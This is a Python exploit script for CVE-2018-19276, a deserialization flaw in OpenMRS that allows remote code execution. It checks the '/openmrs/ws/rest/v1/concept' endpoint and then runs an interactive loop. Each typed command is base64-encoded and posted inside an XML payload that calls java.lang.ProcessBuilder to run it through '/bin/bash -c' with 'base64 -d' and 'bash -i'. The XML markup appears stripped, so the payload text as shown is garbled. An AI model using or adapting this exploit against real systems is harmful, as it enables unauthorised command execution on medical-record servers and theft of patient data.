import base64 import requests import sys import re # for java8 remote = "http://127.0.0.1:8888/" ressource = "/openmrs/ws/rest/v1/concept" proxy = { } if __name__ == "__main__": print("\nCVE-2018-19276 - OpenMRS Insecure Object Deserialization RCE\n") print("[+] Checking if ressource available =>", end=' ') burp0_url = remote + ressource burp0_headers = {"Content-Type": "application/xml"} r = requests.post(burp0_url, headers=burp0_headers, proxies=proxy, verify=False, allow_redirects=False) if r.status_code == 500: print("\033[92mOK\033[0m") else: print("KO, ressource doesn't exist") sys.exit() while True: try: command = input("command (\033[92mnot reflected\033[0m)> ") if command == "exit": print("Exiting...") break command = base64.b64encode(command.encode('utf-8')) command_str = command.decode('utf-8') command_str = command_str.replace('/', '+') print("[+] Executing command =>", end=' ') burp0_url = "http://127.0.0.1:8888/openmrs/ws/rest/v1/concept" burp0_headers = {"Content-Type": "text/xml"} burp0_data = "\r\n \r\n \r\n 0\r\n \r\n \r\n \r\n \r\n \r\n false\r\n 0\r\n \r\n \r\n \r\n \r\n \r\n /bin/bash\r\n -c\r\n \t\t\t{echo," + command_str + \ "}|{base64,-d}|{bash,-i}\r\n \r\n false\r\n \r\n \r\n \r\n \r\n java.lang.ProcessBuilder\r\n start\r\n \r\n \r\n foo\r\n \r\n foo\r\n \r\n \r\n \r\n \r\n \r\n false\r\n 0\r\n 0\r\n false\r\n \r\n false\r\n \r\n \r\n \r\n 0\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n" r = requests.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxy, verify=False, allow_redirects=False) if r.status_code == 500: m = re.search( '(java.util.HashMap)', r.text) if m: print("\033[92mOK\033[0m") else: print("KO") except KeyboardInterrupt: print("Exiting...") break